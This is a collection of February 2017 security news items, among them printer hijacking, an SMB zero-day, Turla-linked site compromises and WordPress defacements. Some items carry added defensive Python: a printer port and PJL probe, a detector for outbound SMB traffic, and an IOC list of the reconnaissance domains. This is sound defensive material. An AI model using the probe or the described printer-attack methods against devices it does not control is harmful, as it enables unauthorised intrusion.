Google expected this precedent to be upheld in its own refusal to comply with a similar search warrant. The government's key argument is that no search is undertaken on foreign soil -- the data is lawfully brought back to the US, and the search is lawfully conducted within the US. For Microsoft, this argument was rejected; but for Google it has been accepted.

"Though the retrieval of the electronic data by Google from its multiple data centers abroad has the potential for an invasion of privacy, the actual infringement of privacy occurs at the time of disclosure in the United States," Rueter wrote.

Google has said it will appeal the ruling. "The magistrate in this case departed from precedent, and we plan to appeal the decision. We will continue to push back on overbroad warrants," it said in a statement.

If the appeal process fails, the case could have serious implications for US/EU business relations. EU data protection laws prevent the export of European personal information to any country that does not have adequate (that is, equivalent) data protection laws. That exclusion would include the US were it not for the special agreement known as Privacy Shield. It is the Privacy Shield that allows US tech giants such as Google and Facebook to operate in Europe; but it also allows any US commercial business to trade with the European Union.

Many commentators believe that Privacy Shield will fail European constitutional examination. It currently exists largely because of the political will on both sides to make it exist; but that will is already being eroded by new President Trump's apparent isolationism and support for US law enforcement.

Speaking to SecurityWeek about the effect that President Trump's executive order titled 'Enhancing Public Safety in the Interior of the United States' might have on Privacy Shield, David Flint (a senior partner at the MacRoberts law firm) commented, "It is unclear at this stage..." But he also added, "The more concerning issue for Privacy Shield is that there is a possible carve out for national security and similar issues and it remains unclear as to the extent that the new Administration will seek to define all foreigners' PII as 'a security issue'."

Privacy Shield, he explained, "is a complex interconnected matrix of law, policy and 'comfort letters'; absent any of these three legs, it is likely that some national data protection authorities may consider that there is no longer confidence in the implementation of that matrix (of which many were skeptical) and declare the US as having inadequate protection - now, and certainly after GDPR implementation."

Poland-based privacy consultant Alexander Hanff was more forthright. "Trump's Executive Order has accelerated the demise of a transatlantic lie - a lie which would have been exposed eventually by the CJEU [the Court of Justice, Europe's ultimate constitutional court] anyway; a lie which circumvents the constitutional rights of EU Citizens."

With such concern over an executive order that does not directly deal with European PII, it is difficult to see how US government access to European data directly from US companies -- especially when the data may be physically stored in Europe -- can withstand a legal challenge to the European courts. It is fair to say that in the current climate, if Google is forced to hand over foreign data on the basis of a search warrant, it could prove the end of Privacy Shield. Search warrants and the FBI could be as toxic to Privacy Shield as Prism and the NSA were to its predecessor Safe Harbor.


LOGmanager can now cooperate with other log management systems

8.2.2017 SecurityWorld Software
Sirwisa has released a new version of LOGmanager, a Czech tool for log management and analysis.

Improvements in the new version include the ability to forward records to higher-level SIEM systems from other vendors, where the logs can be subjected to advanced analysis or correlated with information from other sources.

What's new in LOGmanager version 2.2.0, according to the vendor:

support for forwarding events to an upstream syslog server
support for receiving and parsing events in LEEF format
a button to test the connection to the update server (System > Software)
improved web server configuration (only TLSv1.2 is allowed for connection encryption, HSTS security headers added)
revised dashboards (larger field for entering field names, improvements for displaying work with Windows files, display of alerts, postfix/sendmail and Windows Logons)
the mouse-wheel zoom function has been disabled in Blockly

The essence of LOGmanager is the collection of all relevant events and logs of an organization, storing them in a central secured repository with a predefined retention period, and the ability to search enormous volumes of data in real time. Search results are presented in textual and graphical form with a high degree of interactivity with the data found.

The system also allows data to be stored long-term in a tamper-evident form for compliance needs, forensic analysis requirements and possible security audits. The solution also helps meet the requirements of the Czech Cyber Security Act.

The distributor of LOGmanager in the Czech Republic is Veracomp; for implementation, the services of a number of certified partners can also be used.


Cybercriminals took the Austrian parliament's website offline

7.2.2017 Novinky/Bezpečnost Kyber
On Sunday, hackers took the website of the Austrian parliament offline for roughly twenty minutes, but they did not gain access to any non-public data. The parliament said so in a statement, adding that no damage had been done and that the security authorities are dealing with the case. Meanwhile, the Turkish Islamist group Lion Soldiers Team (ANT) claimed responsibility, the Reuters agency reported.
"The hacker attack was apparently carried out as a so-called DDoS attack; the websites of the foreign and defence ministries were targets of a similar attack last December," the parliament specified in its statement.

A DDoS (Distributed Denial of Service) attack always follows the same scenario. Hundreds of thousands of computers start accessing a particular server at the same moment. The server usually cannot handle such a high number of requests and goes down. To ordinary users, a website attacked in this way appears to be unavailable.

ANT states on its website that it protects the homeland, Islam, the nation and the flag. Reuters noted that relations between Turkey and Austria cooled considerably last year after Austria called for a freeze of the accession talks between the European Union and Ankara.

Vienna was reacting above all to the conduct of the Turkish authorities after last year's failed attempt to overthrow President Recep Tayyip Erdogan. ANT also announced on its website that it is conducting operations against the pro-Kurdish Peoples' Democratic Party (HDP), the Austrian central bank and a certain Austrian airport.

The Czech Republic has faced attacks too
In 2013, several Czech servers faced massive DDoS attacks. They were aimed first at news websites, then at the Seznam.cz portal and the servers of banks and telephone operators.

According to security experts, it was the largest cyberattack in the history of the Czech Republic up to that time.


"We must verify your account information!" Sloppy phishing this time targets Fio Bank customers
7.2.2017 Živě.cz Phishing
The next bank to warn of phishing attacks on its clients is Fio Bank. The attackers are sending out the dangerous e-mails these days and, fortunately, they are easy to recognize thanks to a machine translation in broken Czech. Even that, however, may not stop the least vigilant users from clicking the link and entering their credentials into the fraudulent form.

Even very bad Czech often does not deter users from clicking the link and entering their details into a fraudulent form (photo: Fio Bank)

The e-mails may arrive, for example, from the address kontakt@fiobanka.prihlaste.cz. The website Přihlaste.cz does in fact aggregate links to the internet banking sites of Czech banks as well as the login pages of social networks. Note that the bank's name appears in that address only as a subdomain label; the registered domain the message actually comes from is prihlaste.cz, not the bank's own domain.

In any case, do not click the link in the message; move the e-mail to spam or delete it outright. If you have already entered your details into the fraudulent form, contact customer support immediately.
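The check a mail filter would apply to the address above, as an added example that is not part of the Živě.cz article: extract the registrable domain of the sender and flag messages that carry the bank's name only in the display name or a subdomain of some other domain. That fio.cz is Fio's legitimate domain is an assumption, and the public-suffix handling is deliberately simplified (a real filter would use the Public Suffix List).

```python
from email.utils import parseaddr

# Suffixes under which the registrable name is the third label from the
# right (example.co.uk).  Deliberately short; use the Public Suffix List
# in production.
TWO_LABEL_SUFFIXES = {"co.uk", "com.au", "co.jp"}


def registrable_domain(host: str) -> str:
    """'fiobanka.prihlaste.cz' -> 'prihlaste.cz'; 'login.fio.co.uk' -> 'fio.co.uk'."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def sender_impersonates(from_header: str, brand: str, legit_domains: set) -> bool:
    """True when the brand name shows up in the display name or the host part
    of the address, but the message's registrable domain is not one the brand
    actually owns.  `legit_domains` is the allow-list for that brand."""
    display, addr = parseaddr(from_header)
    if "@" not in addr:
        return False
    host = addr.rsplit("@", 1)[1]
    if registrable_domain(host) in legit_domains:
        return False
    brand = brand.lower()
    return brand in host.lower() or brand in display.lower()


# Assumed allow-list for the bank in the article.
FIO_DOMAINS = {"fio.cz"}

if __name__ == "__main__":
    for hdr in ("kontakt@fiobanka.prihlaste.cz",            # address from the article
                "Fio banka <info@fio.cz>",                  # constructed legitimate sender
                '"Fio banka" <noreply@mail-service.example>'):  # constructed display-name spoof
        print(f"{hdr!r:50} impersonation={sender_impersonates(hdr, 'fio', FIO_DOMAINS)}")
```

The display-name case matters as much as the subdomain case: mail clients on phones often show only the display name, so "Fio banka" from an unrelated domain is the same trick with less effort.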


Attacker takes control of 160,000 printers and prints warnings about attacks on them
7.2.2017 Root.cz Hacking
"For the love of God, please close this port," reads the ASCII-art flyers rolling out of 160,000 printers around the world. A well-meaning hacker is trying to draw attention to security flaws in the PostScript and PJL interpreters of network printers.
A group of researchers from the University Alliance Ruhr documented a set of flaws in the decades-old PostScript and PJL implementations of laser printers, reachable from a web page through a technique they call "cross-site printing" (XSP). The flaws affect printers from well-known names such as Dell, Brother, Konica, Samsung, HP and Lexmark. A successful attacker can exploit them to obtain passwords, extract sensitive data from the print queue or take the device offline.

An old flaw in PS and PJL
What makes the problem worse is that the flaw is not new; it has been hiding in devices for decades. It allows an attacker to browse the printer's file system, provided they can reach it and are allowed to print, which can be arranged over the network or via USB. The researchers who found it wrote a Python tool that allows remotely manipulating the print queue, reading files on disk, accessing the printer's memory or physically destroying the device.

In total, six different security weaknesses were published, enabling buffer overflows, password theft and capture of print jobs. One of the methods combines XSP with Cross-Origin Resource Sharing (CORS) spoofing to reach a printer's raw print port, TCP 9100, from the browser of a user inside the network. The attacker lures the victim to a web page with a hidden iframe, which then starts communicating from the user's computer with the printer hidden inside the network.

The request can contain commands in the PostScript or PJL languages, as the wiki at hacking-printers.net describes. According to the authors, it is also possible to send data from the printer back to the browser if the PostScript output is crafted appropriately: the printer can, for example, emulate an HTTP server and emit the headers that let JavaScript read the response. The printer can then be fully controlled.

A well-meaning attacker
Not long after this security flaw was revealed, 160,000 printers around the world began humming, from large office machines to the receipt printers at checkouts. An unknown attacker going by the handle Stackoverflowin took control of all of them remotely and started printing warning "flyers" stating that the device is vulnerable and should be secured.

Stackoverflowin is in your printer
There are several versions of the image, and photographs of them are starting to appear on the internet. What they have in common is an ASCII-art picture (a robot or a computer) and a short explanatory text. They also include a contact or a link to a Twitter account.

For the love of God, close this port!
The attacker says he is under 18 and that his tool looks for publicly reachable printers with open RAW, IPP (Internet Printing Protocol) and LPR (Line Printer Remote) access on TCP ports 9100, 631 and 515, and then sends print jobs to them. He says what surprised him most was how easy the whole thing was: he scanned the internet with zmap and then ran a simple C program that sent out the jobs. He claims that most printers will accept your own firmware sent this way, and that it does not have to be signed.

The text looks, for example, like this:

stackoverflowin the hacker god has returned, your printer is part of
a flaming botnet, operating on putin's forehead utilising BTI's
(break the internet) complex infrastructure.
[ASCII ART HERE]
For the love of God, please close this port, skid.
-------
Questions?
Twitter: https://twitter.com/lmaostack
-------
Users report messages coming out of many different printer models, for example Afico, Brother, Canon, Epson, HP, Lexmark, Konica Minolta, Oki and Samsung. Products of other manufacturers may well be affected too. According to the young man, the warning was printed on 160,000 devices this way, but the number of attackable printers exceeds 300,000.

For now this is "benign spam" meant to point out a potentially serious problem. Although the printed statements claim the printers are part of a botnet, the attacker says that is not true. The risk is real, though: if someone started exploiting the printers on a massive scale, they could build a botnet similar to Mirai out of them and abuse it at will. Even though this demonstration is itself illegal, so far nobody has actually been harmed.

Do you run a network printer? Check which ports it exposes to the network.
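Following the article's closing advice, here is an added example (not the Root.cz article's code and not the Ruhr researchers' tool) that checks which of the three print ports Stackoverflowin scanned are reachable on a printer and, when the raw port answers, asks the device to identify itself with the PJL `INFO ID` query. The target address 192.0.2.10 is a placeholder, and the reply shown in the parser's docstring is a constructed sample.

```python
import socket

UEL = b"\x1b%-12345X"  # PJL Universal Exit Language: brackets every PJL job
PRINTER_PORTS = {9100: "RAW (AppSocket/JetDirect)", 631: "IPP", 515: "LPR"}


def build_pjl_query(command: str = "INFO ID") -> bytes:
    """Wrap one PJL command in UEL so the printer's interpreter accepts it."""
    return UEL + b"@PJL " + command.encode("ascii") + b"\r\n" + UEL


def parse_pjl_response(raw: bytes) -> dict:
    """Parse a PJL reply such as (constructed sample):
        b'@PJL INFO ID\\r\\n"HP LaserJet 4250"\\r\\n\\x0c'
    into {'command': 'INFO ID', 'values': ['HP LaserJet 4250']}.
    A form feed (0x0c) terminates a PJL reply; anything after it is ignored."""
    body = raw.split(b"\x0c", 1)[0].decode("ascii", errors="replace")
    lines = [ln.strip() for ln in body.replace("\r", "").split("\n") if ln.strip()]
    if not lines or not lines[0].startswith("@PJL"):
        return {"command": None, "values": []}
    command = lines[0][len("@PJL"):].strip()
    values = [ln.strip('"') for ln in lines[1:]]
    return {"command": command, "values": values}


def port_is_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Plain TCP connect; no data is sent."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def query_printer_id(host: str, timeout: float = 3.0) -> dict:
    """Send '@PJL INFO ID' on the raw port and parse whatever comes back.
    The query only reads the device identification; it prints nothing."""
    with socket.create_connection((host, 9100), timeout=timeout) as sock:
        sock.sendall(build_pjl_query("INFO ID"))
        buf = b""
        try:
            while b"\x0c" not in buf:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                buf += chunk
        except socket.timeout:
            pass  # some firmware never sends the form feed; parse what we have
    return parse_pjl_response(buf)


def audit(host: str) -> dict:
    """Which print ports answer; PJL identification if the raw port is open."""
    report = {port: port_is_open(host, port) for port in PRINTER_PORTS}
    if report[9100]:
        report["pjl_id"] = query_printer_id(host)
    return report


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.0.2.10"  # placeholder address
    report = audit(target)
    for port, name in PRINTER_PORTS.items():
        print(f"{name:28} tcp/{port}: {'OPEN' if report[port] else 'closed'}")
    if "pjl_id" in report:
        print("PJL INFO ID ->", report["pjl_id"]["values"])
```

If the raw port is reachable from anywhere other than the print server, that is the port the flyers are asking you to close: restrict 9100, 631 and 515 to the print server's address on the printer's own ACL or on the network, and remember that a browser inside the LAN can still reach them through XSP unless the printer refuses jobs from arbitrary hosts.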


Palo Alto Networks Unveils Big Product Updates, New Firewalls

7.2.2017 securityweek Safety
Palo Alto Networks on Tuesday announced the launch of PAN-OS 8.0, which brings major improvements to the company’s Next-Generation Security Platform, and several new hardware and virtual firewall appliances.

According to the company, PAN-OS 8.0 introduces more than 70 new enhancements and capabilities, including for securing cloud deployments and SaaS applications, preventing the theft and abuse of credentials, simplifying security operations, and blocking threats.

The threat prevention features are designed to prevent sandbox evasion, block command and control (C&C) communications, automate intelligence integration, and improve threat detection and alerting mechanisms.

PAN-OS 8.0 is designed to address credential theft by automatically identifying and blocking phishing websites, preventing users from entering credentials on phishing sites, and providing a policy-based multi-factor authentication framework natively in the firewall to avert the use of stolen credentials.

As for cloud and SaaS, the latest version of the operating system brings optimized workflow automation features for cloud services, and improved visibility, reporting and automation for SaaS applications.

Palo Alto Networks also announced the release of new hardware and virtual firewall appliances that complement PAN-OS 8.0. In addition to the existing 16 hardware appliances, the company now offers six new devices designed to provide improved traffic visibility and control.

The new appliances are PA-5260, PA-5250 and PA-5220 of the PA-5200 series, PA-850 and PA-820 of the PA-800 series, and the PA-220. The PA-5200 series devices are ideal for data centers, the PA-800 series is designed for medium-size networks and branch offices, and the PA-220 is ideal for small branch offices and remote locations.

Some of the new VM-Series virtual firewalls offer performance of up to 16 Gbps and are ideal for service providers and data centers, while the lower-end models are designed for minimal resource consumption and are best suited for virtual branch offices.


Rocket AI and the next generation of AV software
7.2.2017 Kaspersky Security
The annual Conference on Artificial Intelligence and Neural Information Processing Systems (NIPS) was held in Barcelona on 5–10 December 2016. This is, most likely, one of the two most important conferences in the AI field. This year, 5,680 AI experts attended the conference (the second of these large conferences is known as ICML).

This is not the first year that Kaspersky Lab is taking part in the conference – it is paramount for our experts to be well informed on the most up-to-date approaches to machine learning. This time, there were five Kaspersky Lab employees at NIPS, each from a different department and each working with machine learning implementation in order to protect users from cyberthreats.

However, my intent is to tell you not about the benefit of attending the conference but about an amusing incident that was devised and put into action by AI luminaries.

Rocket AI is the Next Generation of Applied AI

This story was covered in detail by Medium, and I shall only briefly relate the essence of the matter.

Right as the conference was happening, the www.rocketai.org website was created, with a promotional bubble on its main page.


Please note that this is not just AI, but the next generation of AI. The idea of the product is described below.


The Temporally Recurrent Optimal Learning™ approach (abbreviated as “TROL(L)”), which was not yet known to science, was actively promoted on Twitter by conference participants. Within several hours, this resulted in five large companies contacting the project’s authors with investment offers. The value of the “project” was estimated at tens of millions of dollars.


Now, it’s time to lay the cards on the table: the Rocket AI project was created by experts in machine learning as a prank whose goal was to draw attention to the issue that was put perfectly into words by an author at Medium.com: “Artificial Intelligence has become the most hyped sector of technology. With national press reporting on its dramatic potential, large corporations and investors are desperately trying to break into this field. Many start-ups go to great lengths to emphasize their use of “machine learning” in their pitches, however trivial it may seem. The tech press celebrates companies with no products, that contribute no new technology, and at overly-inflated cost.”

In reality, little of what is now marketed as new in machine learning is new; the popular approaches to artificial intelligence are decades-old ideas.

“Clever teams are exploiting the obscurity and cachet of this field to raise more money, knowing that investors and the press have little understanding of how machine learning works in practice,” the author added.

An Anti-Virus of the Very Next Generation

It may seem that the outcome of the prank brought out nothing new: investors have a weakness for whatever everyone is talking about. Investment bubbles have existed and will continue to exist. Our generation alone has seen the advent of dotcoms, biometrics, and bitcoins. We have AI now, and I am sure that 2017 will give us something new as well.

Yet, after I had taken a peek at data-security start-ups, which are springing up like mushrooms after a rain and which claim that they employ the “very real” AI (of the very next generation), an amusing idea crossed my mind.

What would happen if we did the same thing that the respected AI experts did? We could come to agreements with other representatives in the cybersecurity area (I would like to point out the principle of “coopetition”, which combines market competition and cooperation in the areas of inspection and user protection) and create a joint project. Meet Rocket AV.


If respected IT experts were to advertise it all over their Twitter accounts, then — who knows? — maybe we could attract tens of millions of dollars’ worth of investments.

But no, it’d probably be better for us to continue doing what we are best at: protecting users from cyberthreats. This is the essence of True CyberSecurity.


Smart TV Maker Fined $2.2 Million For Spying on Its 11 Million Users
7.2.2017 thehackernews Virus
Your government is spying on you! Businesses are spying on you! Your phone and browser are constantly spying on you! Even your TV is spying on you!
Yes, you should also worry about your "smart" TV, as one of the world's biggest smart TV makers Vizio has been caught secretly collecting its consumers' data through over 11 Million smart TVs and then selling them to third-parties without the user's explicit consent.
But the good news is that the home entertainment hardware maker has been fined heavily for this practice.
The US Federal Trade Commission (FTC) announced on Monday that Vizio had spied on almost every customer from its Vizio smart TVs through its Smart Interactivity feature, and rather than fighting back the accusation any longer, the company has agreed to pay a $2.2 Million fine to settle the lawsuit.
"To settle the case, Vizio has agreed to stop unauthorized tracking, to prominently disclose its TV viewing collection practices, and to get consumers’ express consent before collecting and sharing viewing information," the FTC says.
"In addition, the company must delete most of the data it collected and put a privacy program in place that evaluates Vizio’s practices and its partners."
According to FTC, the smart TV maker installed data tracking software to collect viewing habits of 11 million of its smart TVs without informing its customers or seeking their consent.
Besides this, the company also collected each household's IP address, nearby access points, and zip code, and shared that information with other third-party companies, who used it for targeting advertising towards Vizio TV owners.
The data tracking software reportedly worked by collecting a selection of on-screen pixels every second the TV was on, and then comparing that data to a database of known movies, television shows, commercials, and other video content. This practice is known as automatic content recognition (ACR).
According to the FTC, Vizio also recorded the date, time, channel of TV shows, and whether you watched the program live or recorded and took all that information and connected it to your IP address.
With this data in hand, anyone could learn your television viewing habits, and according to the complaint filed by the US Federal Trade Commission, "Vizio then turned that mountain of data into cash by selling consumers' viewing histories to advertisers and others."
However, Vizio has agreed to stop unauthorized tracking, prominently disclose its TV viewing collection practices, and get consumers' express consent before collecting or sharing their information with other companies.
How to Stop Your Smart TV From Spying on You
To check whether your smart TV is also spying on you, open the Vizio TV's settings menu (or open the HDTV Settings app directly) and check whether the options under "Automated content recognition (ACR)" are ON. If they are, follow these steps to turn them off:
Open Setting Menu and Select System
Select Reset & Admin
Select Smart Interactivity.
Press arrow to change setting to off
Besides this, Vizio must also delete most of the data the company gathered and put a privacy program in place that evaluates its practices and partners.


Windows SMB 0-Day Risk Downplayed

7.2.2017 securityweek Vulnerebility

A 0-day vulnerability (CVE-2017-0016) affecting Windows' SMBv3 (Server Message Block) protocol that was revealed last week is no longer considered a Critical issue, but High risk.

The issue resides in the manner in which Windows handles SMB traffic and allows a remote, unauthenticated attacker to cause a denial of service. It is triggered when a vulnerable Windows client system connects to a malicious SMB server, so the attacker needs the victim to initiate the connection, for example by following a file:// link or a UNC path that points at the attacker's host.

SMB is an application-layer network protocol that allows computers to access files, printers, serial ports, and miscellaneous communications between nodes on a local network. It also offers an authenticated inter-process communication mechanism.

The flaw was publicly revealed after the security researcher who discovered it published a proof-of-concept exploit on GitHub. The CERT Coordination Center (CERT/CC) at Carnegie Mellon University assessed the issue as critical and even suggested that it would have a severity score of 10, because of a possible exploitation for arbitrary code execution.

In the meantime, however, CERT revised the initial advisory and removed all mentions of arbitrary code execution, while also downgrading the severity score. With a CVSS (Common Vulnerability Scoring System) score of 7.8, the bug is rated High risk in the updated advisory.

“To be vulnerable, a client needs to support SMBv3, which was introduced in Windows 8 for clients and Windows 2012 on servers,” Johannes B. Ullrich, Ph.D., Dean of Research for the SANS Technology Institute, notes.

Initially mentioning only Windows 10 and Windows 8.1 as confirmed vulnerable platforms, the advisory has been modified to refer to their server counterparts as well: “We have confirmed the crash with fully-patched Windows 10 and Windows 8.1 client systems, as well as the server equivalents of these platforms, Windows Server 2016 and Windows Server 2012 R2,” CERT notes.

As before, the advisory points out that no practical solution to the issue is yet known, but that a workaround would involve blocking outbound SMB connections (TCP ports 139 and 445 along with UDP ports 137 and 138) from the local network to the WAN.
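Because the attack needs a vulnerable client to connect out to an SMB server the attacker controls, the useful detection is SMB traffic leaving the local network towards the internet. The added example below (not from the SecurityWeek article or the CERT/CC advisory) scans simplified flow records for exactly the ports the workaround names. The log format and addresses are constructed, and the internal address space is an assumption to be replaced with your own prefixes.

```python
import ipaddress

# Ports named in the CERT/CC workaround: block these outbound to the WAN.
SMB_PORTS = {("tcp", 139), ("tcp", 445), ("udp", 137), ("udp", 138)}

# Assumed internal address space of the organisation; adjust to your own.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_flow(line: str) -> dict:
    """Constructed record format: '<timestamp> <src> <dst> <dport> <proto>'."""
    ts, src, dst, dport, proto = line.split()
    return {"ts": ts, "src": src, "dst": dst, "dport": int(dport), "proto": proto.lower()}


def is_outbound_smb(flow: dict) -> bool:
    """Internal source talking to a non-internal destination on an SMB port."""
    return ((flow["proto"], flow["dport"]) in SMB_PORTS
            and is_internal(flow["src"])
            and not is_internal(flow["dst"]))


def find_outbound_smb(lines) -> list:
    hits = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        flow = parse_flow(line)
        if is_outbound_smb(flow):
            hits.append(flow)
    return hits


# Constructed sample flows, not real traffic.
SAMPLE_LOG = """\
# timestamp src dst dport proto
2017-02-07T10:15:02Z 10.0.1.25 10.0.1.5 445 tcp
2017-02-07T10:15:09Z 10.0.1.25 203.0.113.7 445 tcp
2017-02-07T10:15:11Z 10.0.1.30 198.51.100.4 443 tcp
2017-02-07T10:15:20Z 10.0.1.30 198.51.100.4 137 udp
2017-02-07T10:15:31Z 192.168.4.9 10.0.0.7 139 tcp
"""

if __name__ == "__main__":
    for hit in find_outbound_smb(SAMPLE_LOG.splitlines()):
        print(f"{hit['ts']} {hit['src']} -> {hit['dst']}:{hit['dport']}/{hit['proto']}  outbound SMB")
```

Of the five constructed flows, only the two that leave the internal ranges on an SMB port are reported; SMB between internal hosts is normal file-sharing traffic and is left alone. If the egress block from the advisory is in place, hits in this report mean the rule is not being enforced somewhere.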

Given that this is no longer considered a Critical flaw, Microsoft is unlikely to patch it via an out-of-band update, but rather via the monthly set of security patches, which are expected to arrive next week. SecurityWeek contacted Microsoft for specifics on this but hasn’t heard back yet.


Turla-Linked Group Targets Embassies, Ministries

7.2.2017 securityweek Virus
Researchers at Forcepoint Security Labs have been monitoring the activities of a threat group that has targeted the websites of ministries, embassies and other organizations from around the world in a reconnaissance campaign.

While it’s unclear exactly who is behind the operation and what their motives are, evidence points to an advanced persistent threat (APT) actor that leverages techniques similar to the ones used by the Russia-linked group known as Turla.

According to the security firm, the attacks targeted the websites of foreign affairs ministries in Moldova, Kyrgyzstan and Uzbekistan; embassies of Russia, Zambia, Jordan and Iraq; a political party, a sports association and a government-run sustainability organization in Austria; a news company in Somalia, a socialist organization in Spain, a road safety entity in Ukraine; a French international cooperation organization; and a plant society and a union in Africa.

Experts pointed out that all of the targeted embassy websites belong to embassies located in the United States, in Washington D.C.

The attackers injected malicious code into each of the compromised sites in an effort to profile their visitors. The malicious code is disguised as a script associated with the web analytics service Clicky.

The hacked sites communicate with various domains; the oldest of them, nbcpost[.]com, was registered in December 2015. In November 2016, the attackers started using psoncorp[.]com and mentalhealthcheck[.]net, both registered in February 2016, and this week they began using travelclothes[.]org, a domain registered in November.

Researchers said a majority of the websites were breached in April 2016 and some of them were under the attackers’ control for up to 10 months.

Forcepoint believes these attacks could be linked to Turla, also known as Waterbug, Venomous Bear and KRYPTON. This theory is based on the overlap in targets and the fact that Turla has been known to use fake web analytics scripts in their reconnaissance campaigns.

Switzerland’s GovCERT reported in May 2016 that the Turla attack aimed at Swiss defense firm RUAG involved malicious code disguised as Google Analytics scripts.

Kaspersky Lab confirmed recently that Turla, which has been around since at least 2007, is still active. Researchers discovered new JavaScript malware used by the group in attacks aimed at organizations located in Greece, Qatar and Romania.
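A site owner who wants to know whether their pages carry the profiling script can check the `<script src>` references against the four domains named above. The following is an added example, not Forcepoint's code: it lists the script sources in a page, flags any served from the reconnaissance domains, and separately flags scripts that borrow Clicky's name while being served from somewhere other than Clicky. The sample HTML is constructed, and static.getclicky.com as Clicky's legitimate script host is an assumption.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Domains named in the Forcepoint write-up (defanged brackets removed).
IOC_DOMAINS = {"nbcpost.com", "psoncorp.com", "mentalhealthcheck.net", "travelclothes.org"}
# Assumption: the host Clicky's real tracking script is served from.
CLICKY_HOSTS = {"static.getclicky.com"}


class ScriptCollector(HTMLParser):
    """Collect the src attribute of every <script> tag."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for key, value in attrs:
                if key.lower() == "src" and value:
                    self.srcs.append(value)


def script_sources(html: str) -> list:
    parser = ScriptCollector()
    parser.feed(html)
    return parser.srcs


def host_of(url: str) -> str:
    """Host of an absolute or protocol-relative URL; '' for a relative path."""
    return (urlsplit(url).hostname or "").lower()


def registrable(host: str) -> str:
    """Last two labels; good enough for the IOC list above."""
    return ".".join(host.split(".")[-2:])


def classify_scripts(html: str) -> list:
    """Return (src, reason) pairs for scripts worth a closer look."""
    findings = []
    for src in script_sources(html):
        host = host_of(src)
        if host and registrable(host) in IOC_DOMAINS:
            findings.append((src, "known reconnaissance domain"))
        elif "clicky" in src.lower() and host and host not in CLICKY_HOSTS:
            findings.append((src, "Clicky-looking script from a non-Clicky host"))
    return findings


# Constructed sample page, not a real compromised site.
SAMPLE_HTML = """<html><head>
<script src="https://static.getclicky.com/js"></script>
<script src="//mentalhealthcheck.net/clicky.js"></script>
<script src="https://cdn.psoncorp.com/js/clicky.js"></script>
<script src="https://analytics.example.net/clicky.js"></script>
<script src="/wp-content/themes/site/main.js"></script>
</head><body></body></html>"""

if __name__ == "__main__":
    for src, reason in classify_scripts(SAMPLE_HTML):
        print(f"{reason:45} {src}")
```

The IOC match is the reliable signal; the second rule is a heuristic that will also catch a self-hosted copy of the Clicky loader, so treat its hits as something to look at rather than something to block outright.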


WordPress content injection flaw abused in defacement campaigns
7.2.2017 securityaffairs Vulnerebility
According to experts at the security firm Sucuri, a critical content injection flaw in WordPress recently disclosed has already been exploited to deface thousands of websites.
A critical vulnerability was recently disclosed in the WordPress CMS: a content injection flaw in the WordPress REST API that was silently patched before its details were made public.


The vulnerability was discovered by a security researcher at the security firm Sucuri, who explained that the flaw could be exploited by an unauthenticated attacker to inject malicious content and to escalate privileges.

An attacker could exploit the content injection flaw to modify posts, pages, and any other content.

“This privilege escalation vulnerability affects the WordPress REST API that was recently put into widespread use across WordPress sites with the introduction of official API endpoints in version 4.7.” states a blog post published by Sucuri. “One of these endpoints allows access (via the API) to view, edit, delete and create posts. Within this particular endpoint, a subtle bug allows visitors to edit any post on the site.

The REST API is enabled by default on all sites using WordPress 4.7 or 4.7.1. If your website is on these versions of WordPress then it is currently vulnerable to this bug.”

The impact of the flaw is severe, at least 18 million websites run the popular WordPress CMS, roughly 26% of the top 10,000 websites are running WordPress.

Experts from Sucuri worked with the WordPress development team, which fixed the content injection vulnerability in release 4.7.2, issued on January 26.

The bad news is that many WordPress websites still haven’t been updated leaving the installation open to the attacks.

Experts from Sucuri reported the first attacks leveraging the vulnerability less than 48 hours after its disclosure.

“In less than 48 hours after the vulnerability was disclosed, we saw multiple public exploits being shared and posted online. With that information easily available, the internet-wide probing and exploit attempts began.” states a report published by Sucuri.

The experts observed several massive defacement campaigns targeting WordPress across the world, in one of these campaigns, the hackers replaced the content of more than 60,000 web pages with “Hacked by” statements.



Sucuri monitored three other operations, two of which appear to share a single source IP address; each has targeted roughly 500 pages.

The risk with such massive defacements is that crooks will leverage the WordPress vulnerability for black-hat SEO campaigns.

“What we expect to see is a lot more SEO spam (Search Engine Poisoning) attempts moving forward. There’s already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability.” states Sucuri.

Search engine poisoning is a profitable activity for the cyber crime ecosystem.

Sucuri's WAF network observed a significant increase in the number of exploit attempts over the past week.


A recent report published by Sucuri states that more than half of the WordPress websites hijacked in 2016 were running an outdated version. By default, WordPress installations are updated automatically, so website administrators are strongly advised not to disable this feature.


Many WordPress Sites Hacked via Recently Patched Flaw

7.2.2017 securityweek Hacking
The critical vulnerability disclosed last week by WordPress developers has already been exploited to hack thousands of websites, security firm Sucuri warned on Monday.

When WordPress 4.7.2 was released on January 26, the developers of the content management system (CMS) informed users that the latest version patched three vulnerabilities, including SQL injection, cross-site scripting (XSS) and access control issues.

Roughly one week later, developers admitted that version 4.7.2 patched another flaw, described as an unauthenticated privilege escalation and content injection vulnerability affecting the REST API. The security hole allows an attacker to modify the content of any post or page on a targeted site.

The flaw, identified by researchers at Sucuri, was disclosed one week after the release of WordPress 4.7.2 to give users enough time to patch their installations. However, according to Sucuri, many WordPress websites still haven’t been updated.

Sucuri, which has tracked four different defacement campaigns, started seeing the first attacks leveraging this vulnerability less than 48 hours after disclosure.

In one of these campaigns, attackers replaced the content of more than 60,000 web pages with “Hacked by” messages. The other three operations, two of which seem to share a single IP address, have each targeted roughly 500 pages.


